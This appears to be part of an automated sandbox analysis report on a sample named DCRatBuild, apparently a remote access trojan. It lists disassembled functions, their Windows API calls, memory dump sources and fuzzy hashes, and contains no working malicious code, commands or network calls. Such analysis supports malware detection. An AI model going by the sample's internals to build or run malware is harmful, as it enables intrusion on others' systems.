                                                                                                                        • __EH_prolog.LIBCMT ref: 004AB098
                                                                                                                          • Part of subcall function 004913DC: __EH_prolog.LIBCMT ref: 004913E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: acdc2b3676071164dc54ecf4aad90338087f97d46ae63a8a3bc8c485fc53d8bd
                                                                                                                        • Instruction ID: c62bbc2498dd9790845972c32033405b4f19275ea5fb13f6815e50493d0427cb
                                                                                                                        • Opcode Fuzzy Hash: acdc2b3676071164dc54ecf4aad90338087f97d46ae63a8a3bc8c485fc53d8bd
                                                                                                                        • Instruction Fuzzy Hash: B3318D75C002499ACF15DF66C8519EEBBB4EF19308F1044AFE409B3242D739AE04CBA9
                                                                                                                        Function 004BAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004BACF8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: 8a7fc6a9b170641aa8426f9ba3d5defc4aaf3cdf649ed4ba705f86801ecd622b
                                                                                                                        • Instruction ID: dae18cb7abdb5d72c8f933b91624229da300ba0e75ae0c30aa48f8e0f525c7b3
                                                                                                                        • Opcode Fuzzy Hash: 8a7fc6a9b170641aa8426f9ba3d5defc4aaf3cdf649ed4ba705f86801ecd622b
                                                                                                                        • Instruction Fuzzy Hash: 42113A376012256F9F219E29EC408DB77AAEB807247164132FD15EB344D738DC2197EA
                                                                                                                        Function 00499215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 4e526a91627a11a3e304ad342b6c37bb35e68c9afa316a61457f3f2e495d912f
                                                                                                                        • Instruction ID: c2318bac22234cc5f52b27edeb2cf5773133d40190723109511cf585b3a521a9
                                                                                                                        • Opcode Fuzzy Hash: 4e526a91627a11a3e304ad342b6c37bb35e68c9afa316a61457f3f2e495d912f
                                                                                                                        • Instruction Fuzzy Hash: 5B018633D00525ABCF11AB69CD819DEBF31AF89754B01457EE811B7252DA388D0086A8
                                                                                                                        Function 004BC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004BB177
                                                                                                                        • _free.LIBCMT ref: 004BC4E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction ID: 1c5f0503afabde8e0fb74a9ac9d2383cf7c7666df653f3ab636dde94ca448916
                                                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction Fuzzy Hash: 9E01D672200305ABE3358E6998C59AAFBEDEB85370F25091EE59483281EA74A905C778
                                                                                                                        Function 004BB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004BB177
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a7aa6061bb7f14d10c6c8b1e92e8441ab2a54e52afb30922893652cc167ebbb1
                                                                                                                        • Instruction ID: 964203905c65d6e9ed0643f2d1cceb6a3fa6a09e27a83eee54c529853fdb6f80
                                                                                                                        • Opcode Fuzzy Hash: a7aa6061bb7f14d10c6c8b1e92e8441ab2a54e52afb30922893652cc167ebbb1
                                                                                                                        • Instruction Fuzzy Hash: 32F0B4325051256BEB615A2AAC15BEF7748EB417F0B188227B80896290CBA8DD0286FC
                                                                                                                        Function 004B3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004B3C3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: b6e658a19216e108c91db912889dced3581fd2f172c9ba61a17b590fd2d64355
                                                                                                                        • Instruction ID: 75b6d8f5a83858b42404078940f5f4f529a95cf28b5399f0bacee89506cdedbc
                                                                                                                        • Opcode Fuzzy Hash: b6e658a19216e108c91db912889dced3581fd2f172c9ba61a17b590fd2d64355
                                                                                                                        • Instruction Fuzzy Hash: 8BF0A7332042169F8F114EEAEC009DB7BB9EF01B227104126FA05E7294DB35DA20C7A4
                                                                                                                        Function 004B8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: b30d46504ba7aba9a5f4587255d27d590505961ba39d264a2a94a9a9e168d197
                                                                                                                        • Instruction ID: 1382f3df430cddb48555ee98ccc8b7c49d588f5849e73e338c56426de4ebfa65
                                                                                                                        • Opcode Fuzzy Hash: b30d46504ba7aba9a5f4587255d27d590505961ba39d264a2a94a9a9e168d197
                                                                                                                        • Instruction Fuzzy Hash: 68E0653120611557EBB12A6A9C15BDF764C9B417B4F15012FBC18D6291CF69CC01C1FD
                                                                                                                        Function 00495ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00495AC2
                                                                                                                          • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 424402ce5bca5df051ba271f986fa65608aa8acb94015cde56257a71d97175f1
                                                                                                                        • Instruction ID: 307cb298e530a01297ee442900e40ab066d96b8c28b0afcb725bd927f4e9627d
                                                                                                                        • Opcode Fuzzy Hash: 424402ce5bca5df051ba271f986fa65608aa8acb94015cde56257a71d97175f1
                                                                                                                        • Instruction Fuzzy Hash: B001DC30801680DAD725EBB8C0817DDFBA4DF2530CF50808FA45A53282CBB82B08D7AB
                                                                                                                        Function 0049A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6C4
                                                                                                                          • Part of subcall function 0049A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6F2
                                                                                                                          • Part of subcall function 0049A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6FE
                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1464966427-0
                                                                                                                        • Opcode ID: c79349752ce5389a10a8b49364b6865a4a71426b68d5b8290853dd400da02ccf
                                                                                                                        • Instruction ID: 90491fbd6662807a8989ba9ac030b145cc663bd579e1d69a4da2a4d41878a468
                                                                                                                        • Opcode Fuzzy Hash: c79349752ce5389a10a8b49364b6865a4a71426b68d5b8290853dd400da02ccf
                                                                                                                        • Instruction Fuzzy Hash: A7F0E931008390AACF6257B44904BC77FE05F15335F04CA5FF0FD12196C27910A48BA7
                                                                                                                        Function 004A0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 004A0E3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExecutionStateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2211380416-0
                                                                                                                        • Opcode ID: b117dc679f55a8d6b1e7f479dbdde388a70906eefc05d17154357b90c11e01e6
                                                                                                                        • Instruction ID: 7b757ce1be3e1b2a37e6295f32899103eb51526fba645c5a4d7eb5f232ce8e40
                                                                                                                        • Opcode Fuzzy Hash: b117dc679f55a8d6b1e7f479dbdde388a70906eefc05d17154357b90c11e01e6
                                                                                                                        • Instruction Fuzzy Hash: EED0C21160105426DE22332A2815BFF2A068FEB329F0D003BB54A5B6A7CA4C0882A27E
                                                                                                                        Function 004AA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GdipAlloc.GDIPLUS(00000010), ref: 004AA62C
                                                                                                                          • Part of subcall function 004AA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004AA3DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1915507550-0
                                                                                                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                        • Instruction ID: b27898bb6229198e456b8905366f3800063eb6dce678ab7ca55b1461776ea0da
                                                                                                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                        • Instruction Fuzzy Hash: EFD0A73020020877DF01AB228D0296E7595EB22344F008027BC82C5141EBB6D920D66B
                                                                                                                        Function 004ADD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,004A1B3E), ref: 004ADD92
                                                                                                                          • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                          • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                          • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                          • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                          • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 897784432-0
                                                                                                                        • Opcode ID: 466734a6050365deed3c95483fada1b22f829e8ce4a9b077f603324e6dd2f2f9
                                                                                                                        • Instruction ID: a3f6301daa7ea548014cbfc9421ca3b82c282766e12ac6b9613dd3f9afe0d89a
                                                                                                                        • Opcode Fuzzy Hash: 466734a6050365deed3c95483fada1b22f829e8ce4a9b077f603324e6dd2f2f9
                                                                                                                        • Instruction Fuzzy Hash: F6D09E32144300BAD6012B52CE06F1A7AA2EB99B09F404599B284740B186729D31DB19
                                                                                                                        Function 004AE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DloadProtectSection.DELAYIMP ref: 004AE5E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DloadProtectSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2203082970-0
                                                                                                                        • Opcode ID: ad15f85b80ce200ef7359652751ab9966a7a2bd290bdd55984640c0b6ac7146a
                                                                                                                        • Instruction ID: d2f3efebc51976db5ed18332f3fb920d5da7fbd7dfa8fb4e7fa5fae07bfce0d9
                                                                                                                        • Opcode Fuzzy Hash: ad15f85b80ce200ef7359652751ab9966a7a2bd290bdd55984640c0b6ac7146a
                                                                                                                        • Instruction Fuzzy Hash: BED0C774580180DAD605EB97A88576532547336704FD00517F26591561D66C4491C70D
                                                                                                                        Function 004998BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileType.KERNELBASE(000000FF,004997BE), ref: 004998C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3081899298-0
                                                                                                                        • Opcode ID: f1160e479780cf0632f6cb43d06a13d48309ec497647cdb95e3e1e32a739dbf1
                                                                                                                        • Instruction ID: f82bd79046fce0176d76b98e24919742dff970aa88a98cc5086600496d4d2e30
                                                                                                                        • Opcode Fuzzy Hash: f1160e479780cf0632f6cb43d06a13d48309ec497647cdb95e3e1e32a739dbf1
                                                                                                                        • Instruction Fuzzy Hash: A9C01234410105858F60EA2898440967B11AA533667B486BDC028851A1D326CC4BEA04
                                                                                                                        Function 004AE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
